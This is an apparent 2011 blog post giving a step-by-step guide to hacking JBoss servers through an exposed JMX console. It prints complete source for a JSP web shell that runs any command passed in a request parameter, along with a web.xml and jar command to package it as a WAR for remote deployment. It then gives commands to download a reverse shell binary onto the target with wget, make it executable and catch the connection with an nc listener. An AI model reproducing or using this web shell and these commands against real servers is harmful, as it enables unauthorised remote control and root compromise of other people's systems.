Sunday, 4 December 2011

Exploit & Hack any version of JBOSS

OK.. in this post I will share how to hack ANY version of JBOSS and get root to the target machine.
Step by Step
1) Browse the target machine :
2) Click on the JMX-CONSOLE, if you can see the page, that's great.
3) Now you need to create a war file with our shell.

3.1) mkdir WEB-INF
3.2)vi cmd.jsp and insert this:

<%@ page import="java.util.*,*"%><%%><HTML><BODY>Commands with JSP<FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><%if (request.getParameter("cmd") != null) {out.println("Command: " + request.getParameter("cmd") + "<BR>");Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));OutputStream os = p.getOutputStream();InputStream in = p.getInputStream();DataInputStream dis = new DataInputStream(in);String disr = dis.readLine();while ( disr != null ) {out.println(disr);disr = dis.readLine();}}%></pre></BODY></HTML>

3.3)vi WEB-INF/web.xml  and insert this:
<?xml version="1.0" ?><web-app xmlns=""xmlns:xsi=""xsi:schemaLocation=""version="2.4"><servlet><servlet-name>Command</servlet-name><jsp-file>/cmd.jsp</jsp-file></servlet></web-app>

3.4) now you have to compile it :  jar cvf cmd.war WEB-INF cmd.jsp
3.5) Move this file to your pentest webserver, you will need to download this file to the target machine.
4) Now browse,flavor=URL
5) Search for "void addURL()"
6) Insert the address for your war file , in my case  :  and click INVOKE
7) It will take about 1min , then you can browse your application
8) Now you just need to type the commands like.. "id" , if you are not root, then you need to find a exploit to root the machine
9) Meanwhile you can get shell to the machine doing this
10) Download to the machine a reverse shell  : wget -P /tmp
11) chmod +x /tmp/airwolf_reverse_shell
12) prepare your pentest machine to get the reverse shell :  nc -l -p 8080 -vvv 
13) Run the reverse shell on the target machine  : /tmp/airwolf_reverse_shell
14) you are now connected to the server.

Now r0x d4 n3tw0rk

1 comment: